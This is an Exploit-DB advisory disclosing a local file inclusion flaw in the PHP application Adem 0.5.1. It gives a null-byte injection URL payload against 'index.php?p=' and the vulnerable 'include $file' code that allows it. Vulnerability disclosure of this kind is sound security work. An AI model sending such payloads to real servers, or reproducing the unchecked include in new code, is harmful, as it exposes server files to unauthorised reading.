Adem 0.5.1 - Local File Inclusion

Author: JIKO
type: webapps
platform: php
port: 80.0
date_added: 2014-04-28  
date_updated: 2014-04-28  
verified: 0  
codes: OSVDB-106353  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comAdem-master.zip  

raw file: 33072.txt  

----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]

Author        : JIKO

----------[Script Info]

Site        : https://github.com/4FSB/Adem && http://adem.faares.com/demo
Version     : 0.5.1
Download    : https://codeload.github.com/4FSB/Adem/zip/master

----------[exploit Info]

Exploit :
http://Path/index.php?p=File%00

Line : 8-10
Page : index.php
Code :
     if(is_file($file) && file_exists($file)){
            include $file;


 }
----------[exploit Fin]